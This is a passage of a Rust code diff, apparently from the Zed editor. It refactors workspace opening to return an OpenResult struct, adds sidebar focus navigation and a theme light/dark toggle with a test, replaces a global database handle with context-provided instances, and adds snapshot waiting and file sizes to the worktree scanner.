@@ -1997,7 +2006,11 @@ impl Workspace {
});
})
.log_err();
- Ok((window, opened_items))
+ Ok(OpenResult {
+ window,
+ workspace,
+ opened_items,
+ })
})
}
@@ -2154,12 +2167,24 @@ impl Workspace {
&self.status_bar
}
- pub fn set_workspace_sidebar_open(&self, open: bool, cx: &mut App) {
+ pub fn set_workspace_sidebar_open(
+ &self,
+ open: bool,
+ has_notifications: bool,
+ show_toggle: bool,
+ cx: &mut App,
+ ) {
self.status_bar.update(cx, |status_bar, cx| {
status_bar.set_workspace_sidebar_open(open, cx);
+ status_bar.set_sidebar_has_notifications(has_notifications, cx);
+ status_bar.set_show_sidebar_toggle(show_toggle, cx);
});
}
+ pub fn set_sidebar_focus_handle(&mut self, handle: Option<FocusHandle>) {
+ self.sidebar_focus_handle = handle;
+ }
+
pub fn status_bar_visible(&self, cx: &App) -> bool {
StatusBarSettings::get_global(cx).show
}
@@ -2691,7 +2716,10 @@ impl Workspace {
cx,
);
cx.spawn_in(window, async move |_vh, cx| {
- let (multi_workspace_window, _) = task.await?;
+ let OpenResult {
+ window: multi_workspace_window,
+ ..
+ } = task.await?;
multi_workspace_window.update(cx, |multi_workspace, window, cx| {
let workspace = multi_workspace.workspace().clone();
workspace.update(cx, |workspace, cx| callback(workspace, window, cx))
@@ -2729,7 +2757,10 @@ impl Workspace {
cx,
);
cx.spawn_in(window, async move |_vh, cx| {
- let (multi_workspace_window, _) = task.await?;
+ let OpenResult {
+ window: multi_workspace_window,
+ ..
+ } = task.await?;
multi_workspace_window.update(cx, |multi_workspace, window, cx| {
let workspace = multi_workspace.workspace().clone();
workspace.update(cx, |workspace, cx| callback(workspace, window, cx))
@@ -3108,7 +3139,7 @@ impl Workspace {
paths: Vec<PathBuf>,
window: &mut Window,
cx: &mut Context<Self>,
- ) -> Task<Result<()>> {
+ ) -> Task<Result<Entity<Workspace>>> {
let window_handle = window.window_handle().downcast::<MultiWorkspace>();
let is_remote = self.project.read(cx).is_via_collab();
let has_worktree = self.project.read(cx).worktrees(cx).next().is_some();
@@ -3124,19 +3155,20 @@ impl Workspace {
let app_state = self.app_state.clone();
cx.spawn(async move |_, cx| {
- cx.update(|cx| {
- open_paths(
- &paths,
- app_state,
- OpenOptions {
- replace_window: window_to_replace,
- ..Default::default()
- },
- cx,
- )
- })
- .await?;
- Ok(())
+ let OpenResult { workspace, .. } = cx
+ .update(|cx| {
+ open_paths(
+ &paths,
+ app_state,
+ OpenOptions {
+ replace_window: window_to_replace,
+ ..Default::default()
+ },
+ cx,
+ )
+ })
+ .await?;
+ Ok(workspace)
})
}
@@ -3341,7 +3373,7 @@ impl Workspace {
.map(|wt| wt.read(cx).abs_path().as_ref().to_path_buf())
}
- fn add_folder_to_project(
+ pub fn add_folder_to_project(
&mut self,
_: &AddFolderToProject,
window: &mut Window,
@@ -3819,6 +3851,14 @@ impl Workspace {
did_focus_panel
}
+ pub fn focus_center_pane(&mut self, window: &mut Window, cx: &mut Context<Self>) {
+ if let Some(item) = self.active_item(cx) {
+ item.item_focus_handle(cx).focus(window, cx);
+ } else {
+ log::error!("Could not find a focus target when switching focus to the center panes",);
+ }
+ }
+
pub fn activate_panel_for_proto_id(
&mut self,
panel_id: PanelId,
@@ -4463,26 +4503,35 @@ impl Workspace {
) {
use ActivateInDirectionTarget as Target;
enum Origin {
+ Sidebar,
LeftDock,
RightDock,
BottomDock,
Center,
}
- let origin: Origin = [
- (&self.left_dock, Origin::LeftDock),
- (&self.right_dock, Origin::RightDock),
- (&self.bottom_dock, Origin::BottomDock),
- ]
- .into_iter()
- .find_map(|(dock, origin)| {
- if dock.focus_handle(cx).contains_focused(window, cx) && dock.read(cx).is_open() {
- Some(origin)
- } else {
- None
- }
- })
- .unwrap_or(Origin::Center);
+ let origin: Origin = if self
+ .sidebar_focus_handle
+ .as_ref()
+ .is_some_and(|h| h.contains_focused(window, cx))
+ {
+ Origin::Sidebar
+ } else {
+ [
+ (&self.left_dock, Origin::LeftDock),
+ (&self.right_dock, Origin::RightDock),
+ (&self.bottom_dock, Origin::BottomDock),
+ ]
+ .into_iter()
+ .find_map(|(dock, origin)| {
+ if dock.focus_handle(cx).contains_focused(window, cx) && dock.read(cx).is_open() {
+ Some(origin)
+ } else {
+ None
+ }
+ })
+ .unwrap_or(Origin::Center)
+ };
let get_last_active_pane = || {
let pane = self
@@ -4501,7 +4550,20 @@ impl Workspace {
let try_dock =
|dock: &Entity<Dock>| dock.read(cx).is_open().then(|| Target::Dock(dock.clone()));
+ let sidebar_target = self
+ .sidebar_focus_handle
+ .as_ref()
+ .map(|h| Target::Sidebar(h.clone()));
+
let target = match (origin, direction) {
+ // From the sidebar, only Right navigates into the workspace.
+ (Origin::Sidebar, SplitDirection::Right) => try_dock(&self.left_dock)
+ .or_else(|| get_last_active_pane().map(Target::Pane))
+ .or_else(|| try_dock(&self.bottom_dock))
+ .or_else(|| try_dock(&self.right_dock)),
+
+ (Origin::Sidebar, _) => None,
+
// We're in the center, so we first try to go to a different pane,
// otherwise try to go to a dock.
(Origin::Center, direction) => {
@@ -4511,7 +4573,7 @@ impl Workspace {
match direction {
SplitDirection::Up => None,
SplitDirection::Down => try_dock(&self.bottom_dock),
- SplitDirection::Left => try_dock(&self.left_dock),
+ SplitDirection::Left => try_dock(&self.left_dock).or(sidebar_target),
SplitDirection::Right => try_dock(&self.right_dock),
}
}
@@ -4525,18 +4587,24 @@ impl Workspace {
}
}
+ (Origin::LeftDock, SplitDirection::Left) => sidebar_target,
+
(Origin::LeftDock, SplitDirection::Down)
| (Origin::RightDock, SplitDirection::Down) => try_dock(&self.bottom_dock),
(Origin::BottomDock, SplitDirection::Up) => get_last_active_pane().map(Target::Pane),
- (Origin::BottomDock, SplitDirection::Left) => try_dock(&self.left_dock),
+ (Origin::BottomDock, SplitDirection::Left) => {
+ try_dock(&self.left_dock).or(sidebar_target)
+ }
(Origin::BottomDock, SplitDirection::Right) => try_dock(&self.right_dock),
(Origin::RightDock, SplitDirection::Left) => {
if let Some(last_active_pane) = get_last_active_pane() {
Some(Target::Pane(last_active_pane))
} else {
- try_dock(&self.bottom_dock).or_else(|| try_dock(&self.left_dock))
+ try_dock(&self.bottom_dock)
+ .or_else(|| try_dock(&self.left_dock))
+ .or(sidebar_target)
}
}
@@ -4565,6 +4633,9 @@ impl Workspace {
}
})
}
+ Some(ActivateInDirectionTarget::Sidebar(focus_handle)) => {
+ focus_handle.focus(window, cx);
+ }
None => {}
}
}
@@ -5924,7 +5995,8 @@ impl Workspace {
self.update_active_view_for_followers(window, cx);
if let Some(database_id) = self.database_id {
- cx.background_spawn(persistence::DB.update_timestamp(database_id))
+ let db = WorkspaceDb::global(cx);
+ cx.background_spawn(async move { db.update_timestamp(database_id).await })
.detach();
}
} else {
@@ -5973,6 +6045,7 @@ impl Workspace {
self.database_id
}
+ #[cfg(any(test, feature = "test-support"))]
pub(crate) fn set_database_id(&mut self, id: WorkspaceId) {
self.database_id = Some(id);
}
@@ -5992,15 +6065,17 @@ impl Workspace {
let window_bounds = window.inner_window_bounds();
let database_id = self.database_id;
let has_paths = !self.root_paths(cx).is_empty();
+ let db = WorkspaceDb::global(cx);
+ let kvp = db::kvp::KeyValueStore::global(cx);
cx.background_executor().spawn(async move {
if !has_paths {
- persistence::write_default_window_bounds(window_bounds, display_uuid)
+ persistence::write_default_window_bounds(&kvp, window_bounds, display_uuid)
.await
.log_err();
}
if let Some(database_id) = database_id {
- DB.set_window_open_status(
+ db.set_window_open_status(
database_id,
SerializedWindowBounds(window_bounds),
display_uuid,
@@ -6008,7 +6083,7 @@ impl Workspace {
.await
.log_err();
} else {
- persistence::write_default_window_bounds(window_bounds, display_uuid)
+ persistence::write_default_window_bounds(&kvp, window_bounds, display_uuid)
.await
.log_err();
}
@@ -6197,8 +6272,9 @@ impl Workspace {
user_toolchains,
};
+ let db = WorkspaceDb::global(cx);
window.spawn(cx, async move |_| {
- persistence::DB.save_workspace(serialized_workspace).await;
+ db.save_workspace(serialized_workspace).await;
})
}
WorkspaceLocation::DetachFromSession => {
@@ -6206,27 +6282,30 @@ impl Workspace {
let display = window.display(cx).and_then(|d| d.uuid().ok());
// Save dock state for empty local workspaces
let docks = build_serialized_docks(self, window, cx);
+ let db = WorkspaceDb::global(cx);
+ let kvp = db::kvp::KeyValueStore::global(cx);
window.spawn(cx, async move |_| {
- persistence::DB
- .set_window_open_status(
- database_id,
- window_bounds,
- display.unwrap_or_default(),
- )
- .await
- .log_err();
- persistence::DB
- .set_session_id(database_id, None)
+ db.set_window_open_status(
+ database_id,
+ window_bounds,
+ display.unwrap_or_default(),
+ )
+ .await
+ .log_err();
+ db.set_session_id(database_id, None).await.log_err();
+ persistence::write_default_dock_state(&kvp, docks)
.await
.log_err();
- persistence::write_default_dock_state(docks).await.log_err();
})
}
WorkspaceLocation::None => {
// Save dock state for empty non-local workspaces
let docks = build_serialized_docks(self, window, cx);
+ let kvp = db::kvp::KeyValueStore::global(cx);
window.spawn(cx, async move |_| {
- persistence::write_default_dock_state(docks).await.log_err();
+ persistence::write_default_dock_state(&kvp, docks)
+ .await
+ .log_err();
})
}
}
@@ -6505,6 +6584,7 @@ impl Workspace {
.on_action(cx.listener(Self::move_item_to_pane_at_index))
.on_action(cx.listener(Self::move_focused_panel_to_next_position))
.on_action(cx.listener(Self::toggle_edit_predictions_all_files))
+ .on_action(cx.listener(Self::toggle_theme_mode))
.on_action(cx.listener(|workspace, _: &Unfollow, window, cx| {
let pane = workspace.active_pane().clone();
workspace.unfollow_in_pane(&pane, window, cx);
@@ -6655,9 +6735,9 @@ impl Workspace {
trusted_worktrees.update(cx, |trusted_worktrees, _| {
trusted_worktrees.clear_trusted_paths()
});
- let clear_task = persistence::DB.clear_trusted_worktrees();
+ let db = WorkspaceDb::global(cx);
cx.spawn(async move |_, cx| {
- if clear_task.await.log_err().is_some() {
+ if db.clear_trusted_worktrees().await.log_err().is_some() {
cx.update(|cx| reload(cx));
}
})
@@ -6845,6 +6925,9 @@ impl Workspace {
}
}),
)
+ .on_action(cx.listener(|workspace, _: &FocusCenterPane, window, cx| {
+ workspace.focus_center_pane(window, cx);
+ }))
.on_action(cx.listener(Workspace::cancel))
}
@@ -6922,6 +7005,12 @@ impl Workspace {
self.modal_layer.read(cx).has_active_modal()
}
+ pub fn is_active_modal_command_palette(&self, cx: &mut App) -> bool {
+ self.modal_layer
+ .read(cx)
+ .is_active_modal_command_palette(cx)
+ }
+
pub fn active_modal<V: ManagedView + 'static>(&self, cx: &App) -> Option<Entity<V>> {
self.modal_layer.read(cx).active_modal()
}
@@ -6960,8 +7049,12 @@ impl Workspace {
) {
self.centered_layout = !self.centered_layout;
if let Some(database_id) = self.database_id() {
- cx.background_spawn(DB.set_centered_layout(database_id, self.centered_layout))
- .detach_and_log_err(cx);
+ let db = WorkspaceDb::global(cx);
+ let centered_layout = self.centered_layout;
+ cx.background_spawn(async move {
+ db.set_centered_layout(database_id, centered_layout).await
+ })
+ .detach_and_log_err(cx);
}
cx.notify();
}
@@ -7159,6 +7252,23 @@ impl Workspace {
});
}
+ fn toggle_theme_mode(&mut self, _: &ToggleMode, _window: &mut Window, cx: &mut Context<Self>) {
+ let current_mode = ThemeSettings::get_global(cx).theme.mode();
+ let next_mode = match current_mode {
+ Some(theme::ThemeAppearanceMode::Light) => theme::ThemeAppearanceMode::Dark,
+ Some(theme::ThemeAppearanceMode::Dark) => theme::ThemeAppearanceMode::Light,
+ Some(theme::ThemeAppearanceMode::System) | None => match cx.theme().appearance() {
+ theme::Appearance::Light => theme::ThemeAppearanceMode::Dark,
+ theme::Appearance::Dark => theme::ThemeAppearanceMode::Light,
+ },
+ };
+
+ let fs = self.project().read(cx).fs().clone();
+ settings::update_settings_file(fs, cx, move |settings, _cx| {
+ theme::set_mode(settings, next_mode);
+ });
+ }
+
pub fn show_worktree_trust_security_modal(
&mut self,
toggle: bool,
@@ -7250,6 +7360,12 @@ impl GlobalAnyActiveCall {
cx.global()
}
}
+
+pub fn merge_conflict_notification_id() -> NotificationId {
+ struct MergeConflictNotification;
+ NotificationId::unique::<MergeConflictNotification>()
+}
+
/// Workspace-local view of a remote participant's location.
#[derive(Clone, Copy, Debug, PartialEq, Eq)]
pub enum ParticipantLocation {
@@ -7442,9 +7558,11 @@ fn open_items(
})
}
+#[derive(Clone)]
enum ActivateInDirectionTarget {
Pane(Entity<Pane>),
Dock(Entity<Dock>),
+ Sidebar(FocusHandle),
}
fn notify_if_database_failed(window: WindowHandle<MultiWorkspace>, cx: &mut AsyncApp) {
@@ -7844,7 +7962,6 @@ impl Render for Workspace {
window,
cx,
)),
-
BottomDockLayout::RightAligned => div()
.flex()
.flex_row()
@@ -7903,7 +8020,6 @@ impl Render for Workspace {
.children(self.render_dock(DockPosition::Bottom, &self.bottom_dock, window, cx))
),
),
-
BottomDockLayout::Contained => div()
.flex()
.flex_row()
@@ -8155,9 +8271,10 @@ impl WorkspaceHandle for Entity<Workspace> {
}
pub async fn last_opened_workspace_location(
+ db: &WorkspaceDb,
fs: &dyn fs::Fs,
) -> Option<(WorkspaceId, SerializedWorkspaceLocation, PathList)> {
- DB.last_workspace(fs)
+ db.last_workspace(fs)
.await
.log_err()
.flatten()
@@ -8165,11 +8282,12 @@ pub async fn last_opened_workspace_location(
}
pub async fn last_session_workspace_locations(
+ db: &WorkspaceDb,
last_session_id: &str,
last_session_window_stack: Option<Vec<WindowId>>,
fs: &dyn fs::Fs,
) -> Option<Vec<SessionWorkspace>> {
- DB.last_session_workspace_locations(last_session_id, last_session_window_stack, fs)
+ db.last_session_workspace_locations(last_session_id, last_session_window_stack, fs)
.await
.log_err()
}
@@ -8194,7 +8312,7 @@ pub async fn restore_multiworkspace(
cx.update(|cx| open_workspace_by_id(first.workspace_id, app_state.clone(), None, cx))
.await?
} else {
- let (window, _items) = cx
+ let OpenResult { window, .. } = cx
.update(|cx| {
Workspace::new_local(
first.paths.paths().to_vec(),
@@ -8232,7 +8350,7 @@ pub async fn restore_multiworkspace(
Some(window_handle),
None,
None,
- true,
+ false,
cx,
)
})
@@ -8315,6 +8433,15 @@ actions!(
CopyRoomId,
]
);
+
+/// Opens the channel notes for a specific channel by its ID.
+#[derive(Clone, PartialEq, Deserialize, JsonSchema, Action)]
+#[action(namespace = collab)]
+#[serde(deny_unknown_fields)]
+pub struct OpenChannelNotesById {
+ pub channel_id: u64,
+}
+
actions!(
zed,
[
@@ -8494,7 +8621,10 @@ pub fn join_channel(
let mut active_window = requesting_window.or_else(|| activate_any_workspace_window(cx));
if active_window.is_none() {
// no open workspaces, make one to show the error in (blergh)
- let (window_handle, _) = cx
+ let OpenResult {
+ window: window_handle,
+ ..
+ } = cx
.update(|cx| {
Workspace::new_local(
vec![],
@@ -8750,6 +8880,14 @@ pub struct OpenOptions {
pub env: Option<HashMap<String, String>>,
}
+/// The result of opening a workspace via [`open_paths`], [`Workspace::new_local`],
+/// or [`Workspace::open_workspace_for_paths`].
+pub struct OpenResult {
+ pub window: WindowHandle<MultiWorkspace>,
+ pub workspace: Entity<Workspace>,
+ pub opened_items: Vec<Option<anyhow::Result<Box<dyn ItemHandle>>>>,
+}
+
/// Opens a workspace by its database ID, used for restoring empty workspaces with unsaved content.
pub fn open_workspace_by_id(
workspace_id: WorkspaceId,
@@ -8771,8 +8909,10 @@ pub fn open_workspace_by_id(
cx,
);
+ let db = WorkspaceDb::global(cx);
+ let kvp = db::kvp::KeyValueStore::global(cx);
cx.spawn(async move |cx| {
- let serialized_workspace = persistence::DB
+ let serialized_workspace = db
.workspace_for_id(workspace_id)
.with_context(|| format!("Workspace {workspace_id:?} not found"))?;
@@ -8804,7 +8944,7 @@ pub fn open_workspace_by_id(
&& let Some(bounds) = serialized_workspace.window_bounds.as_ref()
{
(Some(bounds.0), Some(display))
- } else if let Some((display, bounds)) = persistence::read_default_window_bounds() {
+ } else if let Some((display, bounds)) = persistence::read_default_window_bounds(&kvp) {
(Some(bounds), Some(display))
} else {
(None, None)
@@ -8869,12 +9009,7 @@ pub fn open_paths(
app_state: Arc<AppState>,
open_options: OpenOptions,
cx: &mut App,
-) -> Task<
- anyhow::Result<(
- WindowHandle<MultiWorkspace>,
- Vec<Option<anyhow::Result<Box<dyn ItemHandle>>>>,
- )>,
-> {
+) -> Task<anyhow::Result<OpenResult>> {
let abs_paths = abs_paths.to_vec();
#[cfg(target_os = "windows")]
let wsl_path = abs_paths
@@ -8953,7 +9088,7 @@ pub fn open_paths(
});
});
- Ok((existing, open_task))
+ Ok(OpenResult { window: existing, workspace: target_workspace, opened_items: open_task })
} else {
let result = cx
.update(move |cx| {
@@ -8969,8 +9104,8 @@ pub fn open_paths(
})
.await;
- if let Ok((ref window_handle, _)) = result {
- window_handle
+ if let Ok(ref result) = result {
+ result.window
.update(cx, |_, window, _cx| {
window.activate_window();
})
@@ -8982,9 +9117,9 @@ pub fn open_paths(
#[cfg(target_os = "windows")]
if let Some(util::paths::WslPath{distro, path}) = wsl_path
- && let Ok((multi_workspace_window, _)) = &result
+ && let Ok(ref result) = result
{
- multi_workspace_window
+ result.window
.update(cx, move |multi_workspace, _window, cx| {
struct OpenInWsl;
let workspace = multi_workspace.workspace().clone();
@@ -9031,7 +9166,7 @@ pub fn open_new(
cx,
);
cx.spawn(async move |cx| {
- let (window, _opened_paths) = task.await?;
+ let OpenResult { window, .. } = task.await?;
window
.update(cx, |_, window, _cx| {
window.activate_window();
@@ -9177,7 +9312,8 @@ async fn open_remote_project_inner(
window: WindowHandle<MultiWorkspace>,
cx: &mut AsyncApp,
) -> Result<Vec<Option<Box<dyn ItemHandle>>>> {
- let toolchains = DB.toolchains(workspace_id).await?;
+ let db = cx.update(|cx| WorkspaceDb::global(cx));
+ let toolchains = db.toolchains(workspace_id).await?;
for (toolchain, worktree_path, path) in toolchains {
project
.update(cx, |this, cx| {
@@ -9267,20 +9403,20 @@ fn deserialize_remote_project(
paths: Vec<PathBuf>,
cx: &AsyncApp,
) -> Task<Result<(WorkspaceId, Option<SerializedWorkspace>)>> {
+ let db = cx.update(|cx| WorkspaceDb::global(cx));
cx.background_spawn(async move {
- let remote_connection_id = persistence::DB
+ let remote_connection_id = db
.get_or_create_remote_connection(connection_options)
.await?;
- let serialized_workspace =
- persistence::DB.remote_workspace_for_roots(&paths, remote_connection_id);
+ let serialized_workspace = db.remote_workspace_for_roots(&paths, remote_connection_id);
let workspace_id = if let Some(workspace_id) =
serialized_workspace.as_ref().map(|workspace| workspace.id)
{
workspace_id
} else {
- persistence::DB.next_id().await?
+ db.next_id().await?
};
Ok((workspace_id, serialized_workspace))
@@ -9899,14 +10035,15 @@ pub fn remote_workspace_position_from_db(
cx: &App,
) -> Task<Result<WorkspacePosition>> {
let paths = paths_to_open.to_vec();
+ let db = WorkspaceDb::global(cx);
+ let kvp = db::kvp::KeyValueStore::global(cx);
cx.background_spawn(async move {
- let remote_connection_id = persistence::DB
+ let remote_connection_id = db
.get_or_create_remote_connection(connection_options)
.await
.context("fetching serialized ssh project")?;
- let serialized_workspace =
- persistence::DB.remote_workspace_for_roots(&paths, remote_connection_id);
+ let serialized_workspace = db.remote_workspace_for_roots(&paths, remote_connection_id);
let (window_bounds, display) = if let Some(bounds) = window_bounds_env_override() {
(Some(WindowBounds::Windowed(bounds)), None)
@@ -9916,7 +10053,7 @@ pub fn remote_workspace_position_from_db(
.and_then(|workspace| {
Some((workspace.display?, workspace.window_bounds.map(|b| b.0)?))
})
- .or_else(|| persistence::read_default_window_bounds());
+ .or_else(|| persistence::read_default_window_bounds(&kvp));
if let Some((serialized_display, serialized_bounds)) = restorable_bounds {
(Some(serialized_bounds), Some(serialized_display))
@@ -9973,7 +10110,7 @@ pub fn with_active_or_new_workspace(
#[cfg(test)]
mod tests {
- use std::{cell::RefCell, rc::Rc};
+ use std::{cell::RefCell, rc::Rc, sync::Arc, time::Duration};
use super::*;
use crate::{
@@ -9991,6 +10128,7 @@ mod tests {
use project::{Project, ProjectEntryId};
use serde_json::json;
use settings::SettingsStore;
+ use util::path;
use util::rel_path::rel_path;
#[gpui::test]
@@ -10942,6 +11080,7 @@ mod tests {
assert!(workspace.right_dock().read(cx).is_open());
assert!(!panel.is_zoomed(window, cx));
assert!(!panel.read(cx).focus_handle(cx).contains_focused(window, cx));
+ assert!(pane.read(cx).focus_handle(cx).contains_focused(window, cx));
});
// Close the dock
@@ -10953,6 +11092,7 @@ mod tests {
assert!(!workspace.right_dock().read(cx).is_open());
assert!(!panel.is_zoomed(window, cx));
assert!(!panel.read(cx).focus_handle(cx).contains_focused(window, cx));
+ assert!(pane.read(cx).focus_handle(cx).contains_focused(window, cx));
});
// Open the dock
@@ -13545,10 +13685,79 @@ mod tests {
cx.update(|cx| {
let settings_store = SettingsStore::test(cx);
cx.set_global(settings_store);
+ cx.set_global(db::AppDatabase::test_new());
theme::init(theme::LoadThemes::JustBase, cx);
});
}
+ #[gpui::test]
+ async fn test_toggle_theme_mode_persists_and_updates_active_theme(cx: &mut TestAppContext) {
+ use settings::{ThemeName, ThemeSelection};
+ use theme::SystemAppearance;
+ use zed_actions::theme::ToggleMode;
+
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ let settings_fs: Arc<dyn fs::Fs> = fs.clone();
+
+ fs.insert_tree(path!("/root"), json!({ "file.rs": "fn main() {}\n" }))
+ .await;
+
+ // Build a test project and workspace view so the test can invoke
+ // the workspace action handler the same way the UI would.
+ let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await;
+ let (workspace, cx) =
+ cx.add_window_view(|window, cx| Workspace::test_new(project.clone(), window, cx));
+
+ // Seed the settings file with a plain static light theme so the
+ // first toggle always starts from a known persisted state.
+ workspace.update_in(cx, |_workspace, _window, cx| {
+ *SystemAppearance::global_mut(cx) = SystemAppearance(theme::Appearance::Light);
+ settings::update_settings_file(settings_fs.clone(), cx, |settings, _cx| {
+ settings.theme.theme = Some(ThemeSelection::Static(ThemeName("One Light".into())));
+ });
+ });
+ cx.executor().advance_clock(Duration::from_millis(200));
+ cx.run_until_parked();
+
+ // Confirm the initial persisted settings contain the static theme
+ // we just wrote before any toggling happens.
+ let settings_text = SettingsStore::load_settings(&settings_fs).await.unwrap();
+ assert!(settings_text.contains(r#""theme": "One Light""#));
+
+ // Toggle once. This should migrate the persisted theme settings
+ // into light/dark slots and enable system mode.
+ workspace.update_in(cx, |workspace, window, cx| {
+ workspace.toggle_theme_mode(&ToggleMode, window, cx);
+ });
+ cx.executor().advance_clock(Duration::from_millis(200));
+ cx.run_until_parked();
+
+ // 1. Static -> Dynamic
+ // this assertion checks theme changed from static to dynamic.
+ let settings_text = SettingsStore::load_settings(&settings_fs).await.unwrap();
+ let parsed: serde_json::Value = settings::parse_json_with_comments(&settings_text).unwrap();
+ assert_eq!(
+ parsed["theme"],
+ serde_json::json!({
+ "mode": "system",
+ "light": "One Light",
+ "dark": "One Dark"
+ })
+ );
+
+ // 2. Toggle again, suppose it will change the mode to light
+ workspace.update_in(cx, |workspace, window, cx| {
+ workspace.toggle_theme_mode(&ToggleMode, window, cx);
+ });
+ cx.executor().advance_clock(Duration::from_millis(200));
+ cx.run_until_parked();
+
+ let settings_text = SettingsStore::load_settings(&settings_fs).await.unwrap();
+ assert!(settings_text.contains(r#""mode": "light""#));
+ }
+
fn dirty_project_item(id: u64, path: &str, cx: &mut App) -> Entity<TestProjectItem> {
let item = TestProjectItem::new(id, path, cx);
item.update(cx, |item, _| {
@@ -128,6 +128,7 @@ pub struct LocalWorktree {
scan_requests_tx: channel::Sender<ScanRequest>,
path_prefixes_to_scan_tx: channel::Sender<PathPrefixScanRequest>,
is_scanning: (watch::Sender<bool>, watch::Receiver<bool>),
+ snapshot_subscriptions: VecDeque<(usize, oneshot::Sender<()>)>,
_background_scanner_tasks: Vec<Task<()>>,
update_observer: Option<UpdateObservationState>,
fs: Arc<dyn Fs>,
@@ -267,6 +268,12 @@ struct BackgroundScannerState {
scanning_enabled: bool,
}
+#[derive(Clone, Debug, Eq, PartialEq)]
+struct EventRoot {
+ path: Arc<RelPath>,
+ was_rescanned: bool,
+}
+
#[derive(Debug, Clone)]
struct LocalRepositoryEntry {
work_directory_id: ProjectEntryId,
@@ -464,6 +471,7 @@ impl Worktree {
next_entry_id,
snapshot,
is_scanning: watch::channel_with(true),
+ snapshot_subscriptions: Default::default(),
update_observer: None,
scan_requests_tx,
path_prefixes_to_scan_tx,
@@ -708,6 +716,16 @@ impl Worktree {
}
}
+ pub fn wait_for_snapshot(
+ &mut self,
+ scan_id: usize,
+ ) -> impl Future<Output = Result<()>> + use<> {
+ match self {
+ Worktree::Local(this) => this.wait_for_snapshot(scan_id).boxed(),
+ Worktree::Remote(this) => this.wait_for_snapshot(scan_id).boxed(),
+ }
+ }
+
#[cfg(feature = "test-support")]
pub fn has_update_observer(&self) -> bool {
match self {
@@ -1164,6 +1182,15 @@ impl LocalWorktree {
if !repo_changes.is_empty() {
cx.emit(Event::UpdatedGitRepositories(repo_changes));
}
+
+ while let Some((scan_id, _)) = self.snapshot_subscriptions.front() {
+ if self.snapshot.completed_scan_id >= *scan_id {
+ let (_, tx) = self.snapshot_subscriptions.pop_front().unwrap();
+ tx.send(()).ok();
+ } else {
+ break;
+ }
+ }
}
fn changed_repos(
@@ -1280,6 +1307,28 @@ impl LocalWorktree {
}
}
+ pub fn wait_for_snapshot(
+ &mut self,
+ scan_id: usize,
+ ) -> impl Future<Output = Result<()>> + use<> {
+ let (tx, rx) = oneshot::channel();
+ if self.snapshot.completed_scan_id >= scan_id {
+ tx.send(()).ok();
+ } else {
+ match self
+ .snapshot_subscriptions
+ .binary_search_by_key(&scan_id, |probe| probe.0)
+ {
+ Ok(ix) | Err(ix) => self.snapshot_subscriptions.insert(ix, (scan_id, tx)),
+ }
+ }
+
+ async move {
+ rx.await?;
+ Ok(())
+ }
+ }
+
pub fn snapshot(&self) -> LocalSnapshot {
self.snapshot.clone()
}
@@ -1322,6 +1371,7 @@ impl LocalWorktree {
path,
disk_state: DiskState::Present {
mtime: metadata.mtime,
+ size: metadata.len,
},
is_local: true,
is_private,
@@ -1378,6 +1428,7 @@ impl LocalWorktree {
path,
disk_state: DiskState::Present {
mtime: metadata.mtime,
+ size: metadata.len,
},
is_local: true,
is_private,
@@ -1575,6 +1626,7 @@ impl LocalWorktree {
path,
disk_state: DiskState::Present {
mtime: metadata.mtime,
+ size: metadata.len,
},
entry_id: None,
is_local: true,
@@ -3289,7 +3341,10 @@ impl File {
worktree,
path: entry.path.clone(),
disk_state: if let Some(mtime) = entry.mtime {
- DiskState::Present { mtime }
+ DiskState::Present {
+ mtime,
+ size: entry.size,
+ }
} else {
DiskState::New
},
@@ -3318,7 +3373,7 @@ impl File {
} else if proto.is_deleted {
DiskState::Deleted
} else if let Some(mtime) = proto.mtime.map(&Into::into) {
- DiskState::Present { mtime }
+ DiskState::Present { mtime, size: 0 }
} else {
DiskState::New
};
@@ -3874,7 +3929,7 @@ impl BackgroundScanner {
state.snapshot.completed_scan_id = state.snapshot.scan_id;
}
- self.send_status_update(false, SmallVec::new()).await;
+ self.send_status_update(false, SmallVec::new(), &[]).await;
// Process any any FS events that occurred while performing the initial scan.
// For these events, update events cannot be as precise, because we didn't
@@ -3887,14 +3942,17 @@ impl BackgroundScanner {
self.process_events(
paths
.into_iter()
- .filter(|e| e.kind.is_some())
- .map(Into::into)
+ .filter(|event| event.kind.is_some())
.collect(),
)
.await;
}
if let Some(abs_path) = containing_git_repository {
- self.process_events(vec![abs_path]).await;
+ self.process_events(vec![PathEvent {
+ path: abs_path,
+ kind: Some(fs::PathEventKind::Changed),
+ }])
+ .await;
}
// Continue processing events until the worktree is dropped.
@@ -3925,10 +3983,14 @@ impl BackgroundScanner {
};
if let Some(abs_path) = self.fs.canonicalize(&abs_path).await.log_err() {
- self.process_events(vec![abs_path]).await;
+ self.process_events(vec![PathEvent {
+ path: abs_path,
+ kind: Some(fs::PathEventKind::Changed),
+ }])
+ .await;
}
}
- self.send_status_update(false, request.done).await;
+ self.send_status_update(false, request.done, &[]).await;
}
paths = fs_events_rx.next().fuse() => {
@@ -3936,7 +3998,7 @@ impl BackgroundScanner {
while let Poll::Ready(Some(more_paths)) = futures::poll!(fs_events_rx.next()) {
paths.extend(more_paths);
}
- self.process_events(paths.into_iter().filter(|e| e.kind.is_some()).map(Into::into).collect()).await;
+ self.process_events(paths.into_iter().filter(|event| event.kind.is_some()).collect()).await;
}
_ = global_gitignore_events.next().fuse() => {
@@ -3993,11 +4055,10 @@ impl BackgroundScanner {
)
.await;
- self.send_status_update(scanning, request.done).await
+ self.send_status_update(scanning, request.done, &[]).await
}
- async fn process_events(&self, mut abs_paths: Vec<PathBuf>) {
- log::trace!("process events: {abs_paths:?}");
+ async fn process_events(&self, mut events: Vec<PathEvent>) {
let root_path = self.state.lock().await.snapshot.abs_path.clone();
let root_canonical_path = self.fs.canonicalize(root_path.as_path()).await;
let root_canonical_path = match &root_canonical_path {
@@ -4041,11 +4102,25 @@ impl BackgroundScanner {
let skipped_files_in_dot_git = [COMMIT_MESSAGE, INDEX_LOCK];
let skipped_dirs_in_dot_git = [FSMONITOR_DAEMON, LFS_DIR];
- let mut relative_paths = Vec::with_capacity(abs_paths.len());
+ let mut relative_paths = Vec::with_capacity(events.len());
let mut dot_git_abs_paths = Vec::new();
let mut work_dirs_needing_exclude_update = Vec::new();
- abs_paths.sort_unstable();
- abs_paths.dedup_by(|a, b| a.starts_with(b));
+ events.sort_unstable_by(|left, right| left.path.cmp(&right.path));
+ events.dedup_by(|left, right| {
+ if left.path == right.path {
+ if matches!(left.kind, Some(fs::PathEventKind::Rescan)) {
+ right.kind = left.kind;
+ }
